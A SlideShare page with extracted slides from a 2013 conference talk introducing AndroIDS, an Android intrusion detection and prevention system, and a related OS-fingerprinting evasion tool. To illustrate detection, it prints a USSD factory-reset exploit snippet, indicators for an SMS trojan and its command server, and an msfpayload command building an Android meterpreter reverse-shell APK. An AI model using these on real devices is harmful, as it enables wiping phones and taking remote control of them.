AndroIDS: Mobile Security Reloaded

3,608 views
3,520 views

Published on

Being popular is not always a good thing and here’s why: As mobile devices grow in popularity, so do the incentives for attackers. Mobile malware and threats are clearly on the rise, as attackers experiment with new business models by targeting mobile phones. The threat to mobile devices, however, is not limited to rogue versions of popular apps and adware. Threat actors are also pouncing on mobile users’ banking transactions. Android continues to be a primary target for malware attacks due to its market share and open source architecture.

Nowadays, several behaviour-based malware analysis and detection techniques for mobile threats have been proposed for mobile devices but only about 30 percent of all Android smart phones and tablets have security apps installed.

At DeepSec 2013 Jaime Sanchez (@segofensiva) will present AndroIDS, a signature-based intrusion detection system (IDS) and intrusion prevention system (IPS) that protects your mobile phone by examining headers and contents of all packets entering or leaving it. It will raise alerts or will drop packets when it sees suspicious headers or payloads.

This open source network-based intrusion detection/protection system is being presented as a solution that will provide a high return on investment based on visibility, control, and uptime.

It has the ability to perform real-time traffic analysis and packet logging on networks, featuring:

Protocol analysis, focusing on the examination of values within IP, TCP, UDP and ICMP headers
Content searching & matching, by analyzing every incoming packet against a database of rules; each rule represents the signature of a security exploit.
The framework architecture consists of:

Sensor: runs continuously without human supervision and is capable of analyzing traffic in real time (imposing minimal overhead), sending push alerts to the Android device in order to warn the user about the threat and reports to the Logging Server.
Server: runs inside a Linux Box, and receives all the messages the sensor is sending. It’s also responsible for sending updated signatures to remote devices, storing events in the database, detecting statistical anomalies and for real-time analysis.
The IDS rule language is powerful enough to represent current and future security exploits accurately and very precisely. With the help of custom build signatures, the framework can also be used to detect all kind of attacks designed for mobile devices like the USSD exploit, Webkit remote code execution exploits, DoS attacks or the meterpreter module for Android. IDS rule language converts Snort-like rules to an AndroIDS friendly format. It has also some interesting modules that let users cheat the operating system fingerprinting attempts by sending up to 16 TCP, UDP, and ICMP responses to nmap’s probes or changing the TCP header fields to avoid pof’s detection engine.

Android mobile users should start taking security seriously…

Published in: Technology
1 Comment
5 Likes
Statistics
Notes
No Downloads
Views
Total views
3,608
On SlideShare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
734
Comments
1
Likes
5
Embeds 0
No embeds

No notes for slide

AndroIDS: Mobile Security Reloaded

  1. 1. ANDROIDS : MOBILE SECURITY RELOADED
  2. 2. ANDROIDS: MOBILE SECURITY RELOADED $"WHO"I"AM !"Passionate"about"computer"security. !"Computer"Engineering"degree"and"an"Execu7ve" MBA." !"I’m"from"Spain;"We’re"sexy"and"you"know"it. !"You"can"follow" my"adventures" at"@segofensiva" or"in"my"blog"h?p://www.seguridadofensiva.com !""Other"conferences: !"RootedCON"in"Spain !"Nuit"Du"Hack"in"Paris" !"Black"Hat"Arsenal"in"USA !"Defcon"in"USA !"... JAIME SÁNCHEZ (@SEGOFENSIVA) 2 DEEPSEC
  3. 3. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MOTIVATIONS !" Smartphones" have" evolved" into" sophisGcated," compact"minicomputers !"Stores"sensiGve/private"informaGon"and"services !"Smartphones"usage"is"on"the"raise" !"SuscepGble"to"various"PCKlike"types"of"aLacks !" The" importance" of" security" mechanisms" is" not" yet"understood !"Security"mechanisms"are"not"sufficient !"Variety"of"plaOorms JAIME SÁNCHEZ (@SEGOFENSIVA) 3 DEFCON 21 DEEPSEC
  4. 4. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED WHY"ANDROID? !"Being"popular"is"not"always"a"good"thing. !"Mobile"malware"and"threats"are"clearly"on"the"rise. !"Over" 100" million"Android"phones" shipped"in"the"second"quarter" of"2012" alone. !""Targets"this"large"are"difficult"for"a?ackers"to"resist!" JAIME SÁNCHEZ (@SEGOFENSIVA) 4 DEFCON 21 DEEPSEC
  5. 5. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED THE"PLATFORM !" Android" has" inherited" powerful" base"systems"from"Linux"Kernel"such" as" the" memory" management," mulGtasking"and"file"management. !" Android" is" a" plaOorm" which" embraces" numerous" technologies" like" Linux" Kernel," C++," Java," Dalvik" VM,"etc. !" Android" has" a" processRunit" component" model" and" provides" system" func7ons" as" server" processes." For" a" funcGonal" meshKup" of" processes," it" provides"Binder. !"Why"has"a"new"mechanism"been"developed,"rather"than"using"(IPC),"such" as"sockets"and"pipes"provided"by"Linux?"It"is"because"of"performance. JAIME SÁNCHEZ (@SEGOFENSIVA) 5 DEFCON 21 DEEPSEC
  6. 6. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SECURITY"ARCHITECTURE !" Android" seeks" to" be" the" most" secure" and" usable" operaGng" system" for" mobile" plaOorms" by" reKpurposing" tradiGonal" operaGng" system" security" controls"to: !"Protect"user"data !"Protect"system"resources"(including"the"network) !"Provide"applicaGon"isolaGon !"To"achieve"these"objecGves,"Android"provides"these"key"security"features: !"Robust"security"at"the"OS"level"through"the"Linux"kernel !"Mandatory"applicaGon"sandbox"for"all"applicaGons !"Secure"interprocess"communicaGon !"ApplicaGon"signing !"ApplicaGonKdefined"and"userKgranted"permissions !" Each" component" assumes" that" the" components" below" are" properly" secured. JAIME SÁNCHEZ (@SEGOFENSIVA) 6 DEFCON 21 DEEPSEC
  7. 7. THE"PROBLEM"? There is a massive growth in the volume of malware families and samples ... Google"Play’s"track"record"with"malware"is"not"too" good"(Bouncer"can"be"compromised)"...
  8. 8. THE"ONLY"PROBLEM"?
  9. 9. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android v1.0 CVE-2009-0475 (Remote code execution) CVE-2009-0606 (Privilege Escalation) CVE-2009-0607 (Multiple Integer Overflows) CVE-2009-0608 (Integer Overflow) CVE-2009-1895 (Privilege Escalation) CVE-2009-1754 (Access to Sensitive Information) CVE-2009-2348 (Access to Camera and Record Audio) CVE-2009-2656 (DoS through SMS) CVE-2009-2999 (DoS through SMS) CVE-2009-3698 (DoS through Dalvik API) CVE-2009-1185 (Privilege Escalation) CVE-2009-1186 (DoS through udev) Android v2.0 CVE-2009-1442 (Code Execution) CVE-2010-EASY (Privilege Escalation) CVE-2009-2692 (Privilege Escalation) CVE-2010-1807 (WebKitPrivilege Escalation) CVE-2010-1119 (WebKit Privilege Escalation) CVE-2011-1149 (Privilege Escalation) CVE-2011-3975 (Access to Sensitive Information) CVE-2011-2357 (Cross-Application Scripting) CVE-2011-0680 (Access to Sensitive Information) CVE-2011-2344 (Gain Privileges and Access Pictures) CVE-2011-1823 (Code Execution) JAIME SÁNCHEZ (@SEGOFENSIVA) Android v3.0 CVE-2010-4804 (Information Disclosure) CVE-2011-1823 (Privilege Escalation) CVE-2011-0640 (Code Execution) CVE-2011-1349 (DoS) CVE-2011-1350 (Privilege Escalation) CVE-2011-1352 (Privilege Escalation) CVE-2011-2343 (Access to Sensitive Information) CVE-2011-3874 (Privilege Escalation) CVE-2011-2357 (Bypass Permissions) 9 DEFCON 21 DEEPSEC
  10. 10. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED DIRTY"USSD Poor"SSL/TLS"implementaGons" KernelKmode"driver"exploits NFC"VulnerabiliGes Android"Master"Key ... !!!"METERPRETER"FOR" ANDROID"!!! JAIME SÁNCHEZ (@SEGOFENSIVA) 10 DEFCON 21 DEEPSEC
  11. 11. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Mobile"Pwn2Own"2013 !" One" exploit" took"advantage" of" two" Chrome"on"Nexus"4"vulnerabiliGes"–" an" integer" overflow"that"affects" Chrome"and"another"Chrome" vulnerability"that"resulted"in"a"full" sandbox"escape"and"the"possibility"of"remote"code"execuGon"on"the"affected"device. !"Two"exploits"compromised"apps"that"are"installed"on"all"Samsung"Galaxy"S4"devices. JAIME SÁNCHEZ (@SEGOFENSIVA) 11 DEFCON 21 DEEPSEC
  12. 12. FIRST"APPROACH
  13. 13. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED VPN eth0:WiFi rmnet0: 3G snort tcpdump Internet gateway !"In"order"to"analyze"the"traffic"flows"we’ll"create"a"VPN"tunnel"between"our" Android"device"and"our"computer. !" The" VPN" tunnel" uses" digital" cerGficates" (public/private" key" pair)" to" authenGcate"the"client"and"the"server. !"Using"digital"cerGficates"instead"of"a"shared"key"gives"higher"flexibility,"for" instance"we"can"revoke"access"in"case"if"the"smartphone"is"lost. JAIME SÁNCHEZ (@SEGOFENSIVA) 13 DEFCON 21 DEEPSEC
  14. 14. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !"Once"the"VPN"tunnel"is"established" and" the" traffic" is" being" sent" to" the" VPS," we" can" start" monitoring" the" traffic"with"snort. !" We" will" take" advantage" of" two" main"signatures:" official" rules" (the" registered" version" rules)" and" the" Emerging" Threats" (Emerging" Threats). !" We" can" also" use" tools" like" tcpdump" to" capture" traffic" for" later" analysis. !"Wireshark"gives"a"much"beLer"view"of"the"content"and"the"qualiGes" of"each"IP"datagram"or"the"TCP"segments JAIME SÁNCHEZ (@SEGOFENSIVA) 14 DEFCON 21 DEEPSEC
  15. 15. HELLO,"LOSER! JAIME SÁNCHEZ (@SEGOFENSIVA)
  16. 16. LIFE"CONTINUED
  17. 17. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" OSfooler" is" a" pracGcal" approach" presented" at" Black" Hat" Arsenal" USA" 2013. !" It" can" be" used" to" detect" and" defeat" acGve" and" passive" remote" OS" fingerprinGng"from"tools"like"nmap,"p0f"or"commercial"appliances. JAIME SÁNCHEZ (@SEGOFENSIVA) 17 DEFCON 21 DEEPSEC
  18. 18. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED NMAP"INTERNAL"PROBES Fingerprint Linux 2.6.17 - 2.6.24 Class Linux | Linux | 2.6.X | general purpose SEQ(SP=A5-D5%GCD=1-6%ISR=A7-D7%TI=Z%II=I%TS=U) OPS(O1=M400C%O2=M400C%O3=M400C%O4=M400C%O5=M400C%O6=M400C) WIN(W1=8018%W2=8018%W3=8018%W4=8018%W5=8018%W6=8018) ECN(R=Y%DF=Y%T=3B-45%TG=40%W=8018%O=M400C%CC=N%Q=) T1(R=Y%DF=Y%T=3B-45%TG=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=Y%DF=Y%T=3B-45%TG=40%W=8018%S=O%A=S+%F=AS%O=M400C%RD=0%Q=) T4(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T5(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) T6(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=) T7(R=Y%DF=Y%T=3B-45%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=) U1(DF=N%T=3B-45%TG=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G) IE(DFI=N%T=3B-45%TG=40%CD=S) Most"important: !"TCP"ISN"greatest"common"divisor"(GDC) !"TCP"IP"ID"sequence"generaGon"alg"(TI) !"TCP"Gmestamp"opGon"alg"(TS) !"TCP"OpGons"(O,"O1RO6) !"TCP"iniGal"Window"Size"(W,"W1RW6) !"Responsiveness"(R) !"IP"don’t"fragment"bit"(DF) !"IP"iniGal"GmeKtoKlive"guess"(TG) JAIME SÁNCHEZ (@SEGOFENSIVA) Although"there"are"others: !"TCP"ISN"counter"rate"(ISR) !"ICMP"IP"ID"sequence"generaGon"alg"(II) !"Shared"IP"ID"sequence"Boolean"(SS) !"Don’t"Fragment"ICMP"(DFI) !"Explicit"congesGon"noGficaGon"(C) !"TCP"miscellaneous"quirks"(Q) !"TCP"sequence"number"(S) !"etc. 18 NUIT DU HACK 2013 DEEPSEC
  19. 19. OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN P0F"SIGNATURES 8192:32:1:48:M*,N,N,S:.:Windows:98 Opera&ng)System ""K"Family ""K"Version Packet) Size Quirks """K"Data"in"SYN"packets """K"OpGons"arer"EOL """K"IP"ID"Field"="0 """K"ACK"different"to"0 """K"Unusual"flags """K"Incorrect"opGons"decode DF)Bit) Ini&al)TTL TCP)op&ons)and)order Window)Size """K"N:"NOP """K"E:"EOL """K"Wnnn:"WS """K"Mnnn:"MSS """K"S:"SACK """K"T"/"T0:"Timestamp"" """K"?n """K"*"Any"value """K"%nnn"nnn"MulGple """K"Sxx"MSS"MulGple """K"Txx"MTU"MulGple """K"xxx"Constant"value JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) 16 19 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
  20. 20. BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED !" I" need" to" process" traffic" before" being"processed"inside"my"Android" device. !" I" can"redirect"all" network" packet" from"Kernel"Space"to"User"Space !"I"can"do"whatever"I"want"with"the" packets !"This"is"done"in"RealR7me. !" Runs" conGnuously" without" h u m a n" s u p e r v i s i o n" a n d" i s" completely"transparent"for"user. JAIME SÁNCHEZ (@SEGOFENSIVA) 20 DEFCON 21 DEEPSEC
  21. 21. I’VE"GOT"IT"!
  22. 22. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED !"Computer"operaGng"systems"provide" different"levels"of"access"to"resources. Ring"3 !"This"is"generally"hardwareKenforced"by" some"CPU"architectures"hat"provide" different"CPU"modes"at"the"hardware"or" microcode"level. Ring"2 Ring"1 Ring"0 Kernel !"Rings"are"arranged"in"a"hierarchy"from" most"privileged"(most"trusted,"usually" numbered"zero)"to"least"privileged"(least" trusted). Devices Devices Devices Less Privileged JAIME SÁNCHEZ (@SEGOFENSIVA) More Privileged !"On"most"operaGng"systems,"RING"0"is" the"level"with"the"most"privileges"and" interacts"most"directly"with"the"physical" hardware"such"as"the"CPU"and"memory. 22 NUIT DU HACK 2013 DEEPSEC
  23. 23. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED KERNEL"vs"USER"SPACE KERNEL"SPACE USER"SPACE KERNEL"SPACE)is)strictly)reserved)for)running)the)kernel,)kernel)extensions,)and)most)device) drivers.)In)contrast,)user) space)is)the)memory) area)where)all)user)mode)applica&ons)work) and)this)memory)can)be)swapped)out)when)necessary. Similarly,) the) term) USER" LAND) refers) to) all) applica&on) soKware) that) runs) in) user) space.) Userland)usually)refers)to)the)various)programs)and)libraries)that)the)opera&ng)system)uses) to)interact)with)the)kernel:) soKware) that) performs)input/output,) manipulates) file) system,) objects,)etc. JAIME SÁNCHEZ (@SEGOFENSIVA) 23 NUIT DU HACK 2013 DEEPSEC
  24. 24. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED WTF"!? JAIME SÁNCHEZ (@SEGOFENSIVA) 24 NUIT DU HACK 2013 DEEPSEC
  25. 25. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Internal Memory Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  26. 26. OSFOOLER: REMOTEMOBILE SECURITY RELOADED FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven ... SPACE TO USER OVER ANDROIDS: OS FINGERPRINTING ISHEAVEN USER"SPACE APPLICATION read() TCP"recv"Buffer TCP"Process KERNEL"SPACE CONNTRACK Inbound"Packets MANGLE Socket Backlog PREROUTING FORWARD ip_rcv() IP"Layer forwarded"and"accepted"packets Pointer"to Device locally"desGned"packets"must"pass"the" INPUT"chains"to"reach"listening"sockets tcp_v4_rcv() FILTER NIC INPUT sorirq forwarded" packets Memory Kernel local packets Packet"Data Interrupt Handler Poll"List ConGnue"Processing Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) Incoming"Packet 27 NUIT DU HACK 2013 2013 BLACKHAT ARSENAL USA DEEPSEC
  27. 27. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  28. 28. OSFOOLER: REMOTEMOBILE SECURITY RELOADED From"kernel"Space"to"user"Heaven How"i"met"your"packet ANDROIDS: OS FINGERPRINTING IS OVER ... APPLICATION USER"SPACE read() TCP"recv"Buffer TCP"Process KERNEL"SPACE tcp_v4_rcv() Socket Backlog IP"Layer Pointer"to Device NIC ip_rcv() sorirq Memory Kernel Packet"Data Interrupt Handler Poll"List Ring Buffer DEVICE"DRIVER Interrupt DMA"Engine NIC"Memory Incoming"Packet JAIME SANCHEZ (@SEGOFENSIVA) JAIME SÁNCHEZ (@SEGOFENSIVA) BLACKHAT ARSENAL USA 2013 DEEPSEC
  29. 29. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED IPTABLES )A)target"extension"consists"of"a"KERNEL"MODULE,)and)an)op&onal)extension)to)iptables)to) provide)new)command)line)op&ons. There)are)several)extensions)in)the)default)NeRilter)distribu&on: JAIME SÁNCHEZ (@SEGOFENSIVA) 30 NUIT DU HACK 2013 DEEPSEC
  30. 30. FROM KERNEL How"i"met"your"packet From"kernel"Space"to"user"Heaven SPACE TO USER HEAVEN ANDROIDS: MOBILE SECURITY RELOADED QUEUE !)QUEUE)is)an)iptables)and)ip6tables)target)which)which)queues"the"packet"for"userspace" processing. !)For)this)to)be)useful,)two)further)components)are)required: • a)QUEUE"HANDLER)which)deals)with)the)actual)mechanics)of)passing)packets)between) the)kernel)and)userspace;)and • a)USERSPACE"APPLICATION)to)receive,)possibly)manipulate,)and)issue)verdicts)on) packets. !)The)default)value)for)the)maximum)queue)length)is)1024.)Once)this)limit)is)reached,)new) packets)will)be)dropped)un&l)the)length)of)the)queue)falls)below)the)limit)again.) $ iptables -A INPUT -j NFQUEUE --queue-num 0 JAIME SÁNCHEZ (@SEGOFENSIVA) 31 13 NUIT DU HACK 2013 DEEPSEC
  31. 31. ANDROIDS
  32. 32. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED The"logo"should"look"like"... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  33. 33. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PLEASE!"don't"make"decisions"at" night"in"Las"Vegas JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  34. 34. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED ANDROIDS !" Create" a" serious" open" source" networkKbased" intrusion" detecGon" system"(IDS)"and"networkKbased"intrusion"protecGon"system""(IPS)"has" the" ability" to"perform"realKGme" traffic"analysis"and" packet" logging" on" Internet"Protocol"(IP)"networks: !"It"should"feature: !"Protocol"analysis !"Content"searching !"Content"matching JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  35. 35. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SENSOR !" Runs" conGnuously" and" without" human" supervision,"featuring: !"Analyze"traffic !" Send"push"alerts" to"the" Android"device" in"order"to"warn"the"user"about"the"threat !"Report"to"Logging"Server"Custom !"Deploy"some"reacGve"acGons: !"Drop"specific"packet !"Add"new"rule"in"iptables"firewall !"Launch"script"/"module !" Sync" aLack" signatures" to" keep" them" updated. !"It"should"impose"minimal"overhead. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  36. 36. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED IDS"ARCHITECTURE:"SERVER Web Interface Android Device Internet Firewall IDS"Server"& Database !" The" server" is" running" inside" a" Linux" Box," and" is" receiving" all" the" messages"the"Android"sensor"is"sending. !"Server"is"responsible"for: !"Send"signatures"to"remote"devices !"Store"events"in"database !"Detects"staGsGcal"anomalies"&"analysis"realKGme. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  37. 37. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MAYBE"ONE"DAY"... !" CollaboraGve" detecGon" and" detecGon" of" malware" propagaGon" paLerns"across"a"community"of"mobile"devices !"Evaluate"various"detecGon"algorithms !"Alert"about"a"detected"anomaly"when"it"persists !"More"reacGve"acGons: !"Uninstall"suspicious"applicaGon !"Kill"process !"Disconnect"radios !"Encrypt"data !"Monitor"system"calls"in"realKGme JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  38. 38. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PROTOCOL"ANALYSIS LOOKS"LIKE"I"PICKED"THE"WRONG"WEEK TO"QUIT"SNIFFING"PACKETS JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  39. 39. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED " !"Packet"with"FIN,"SYN,"PUSH"and"URG"flags"acGve." !"Report"to"the"Central"Logger"and"DROP"the"packet. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  40. 40. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED REMOTE"OS"FINGERPRINTING !"Detect"and"drop"packet"sent"from"wellKknown"scanning"tools. !"nmap"OS"fingerprinGng"works"by"sending"up"to"16"TCP,"UDP,"and"ICMP"probes" to"known"open"and"closed"ports"of"the"target"machine. SEQUENCE"GENERATION"(SEQ,"OPS,"WIN"&"T1) ICMP"ECHO"(IE) TCP"EXPLICIT"CONGESTION"NOTIFICATION"(ECN) TCP"T2RT7 UDP JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  41. 41. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED PATTERN"MATCHING I’M"WATCHING"YOU... JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  42. 42. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED SIGNATURE"FORMAT !"With"the"help"of"custom"build"signatures,"the"framework"can"also"be" used"to"detect"probes"or"aLacks"designed"for"mobile"devices " !"Useful"signatures"from"Snort"and"Emerging"Threats !"Convert"snortKlike"rules"to"a"friendly"format: JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  43. 43. MORE"EXAMPLES"!
  44. 44. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED Android"2.0"USERAFTERRFREE"REMOTE"CODE"EXECUTION !) Does)not)properly)validate) floa&ngpoint)data,) which)allows)remote) a]ackers) to)execute) arbitrary)code)or)cause)a)denial)of)service. !)Executed)via)craKed)HTML)document. JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  45. 45. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED USSD"EXPLOIT !"A" USSD" code" is"entered"into"phones" to"perform" acGons. !" They" are" mainly" used" by" network" operators" to" provide" customers" with" easy" access" to" preK configured"services,"including: !"callKforwarding !"balance"inquiries !"mulGple"SIM"funcGons. !"The"HTML"code"to"execute"such"an"acGon"is"as"follows: <a#href="tel:xyz">Click#here#to#call</a> !"Example"exploit: <frameset>#<frame#src="tel:*2767*3855#"#/>#</#frameset> JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  46. 46. How"i"met"your"packet BUILDING AN ANDROID IDS ON NETWORK LEVEL ANDROIDS: MOBILE SECURITY RELOADED MALWARE !"ANDR.TROJAN.SMSSEND !"Download"from: !"hxxp://adobeflashplayerEup.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184" !"hxxp://googleplaynew.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"hxxp://browsernewEupdate.ru/?a=RANDOM_CHARACTERS"–"93.170.107.184 !"Once"executed,"connect"to"C&C:""gaga01.net/rq.php !oard=unknown;brand=generic;device=generic;imei=XXXXXX;imsi=XXXXXX;session_i d=1;operator=XXX;sms0=XXXXXX;sms1=XXXXXX;sms2=XXXXXX;]me=XXXXXX;]mezo ne=XXXXXX !"Search"paLern:"rq.php !"METERPRETER !""It"features"command"history,"tab"compleGon," channels,"and"more. !"Let’s"try: $#msfpayload#android/meterpreter/reverse_tcp#LHOST=192.168.0.20#R#>#meter.apk $#file#meter.apk# ###meter.apk:#Zip#archive#data,#at#least#v2.0#to#extract JAIME SÁNCHEZ (@SEGOFENSIVA) DEFCON 21 DEEPSEC
  47. 47. T H A N K Y O U! JAIME SÁNCHEZ (@SEGOFENSIVA) JSANCHEZ@SEGURIDADOFENSIVA.COM

×